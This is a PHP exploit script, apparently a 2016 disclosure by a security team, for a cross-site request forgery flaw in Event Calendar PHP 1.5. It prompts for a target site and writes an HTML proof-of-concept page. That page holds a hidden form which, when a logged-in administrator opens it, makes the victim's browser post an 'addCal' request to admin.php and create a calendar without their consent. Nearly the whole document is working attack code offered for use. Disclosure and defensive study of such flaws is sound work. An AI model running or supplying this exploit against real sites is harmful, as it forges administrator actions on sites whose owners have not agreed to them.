<?php
#=====================================================
# Event Calendar PHP 1.5 - Cross-Site Request Forgery
#=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Demo Link : http://eventcalendarphp.com/eventcalendar/admin.php
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
#=====================================================
print "
#######################################################################
# Event Calendar PHP 1.5 CSRF #
# Discovered By Ehsan Hosseini #
# Ashiyane Digital Security Team #
# We Love Leader #
#######################################################################\n\n";
print 'Enter Site Url (localhost): ';
$site = htmlspecialchars(trim(fgets(STDIN,256)));
print 'Enter Calender Name: ';
$cal_name = htmlspecialchars(trim(fgets(STDIN,256)));
print 'Enter Description Name: ';
$description = htmlspecialchars(trim(fgets(STDIN,256)));
$poc = "<html>
<!-- CSRF PoC -->
<body>
<form action='http://$site/admin.php' method='post' name='form'
enctype='multipart/form-data'>
<input type='hidden' name='act' value='addCal'>
<input type='hidden' name='cal_name' value='$cal_name'>
<input type='hidden' name='description' value='$description'>
<input name='submit' type='submit' value='Create Calendar'>
</form>
</body>
</html>";
print 'Enter Exploit name (csrfpoc)';
$pocname = trim(fgets(STDIN,256));
$exploit = fopen("$pocname.html", "w");
fwrite($exploit, $poc);
fclose($exploit);
#=====================================================
# Discovered By : Ehsan Hosseini
#=====================================================
?>
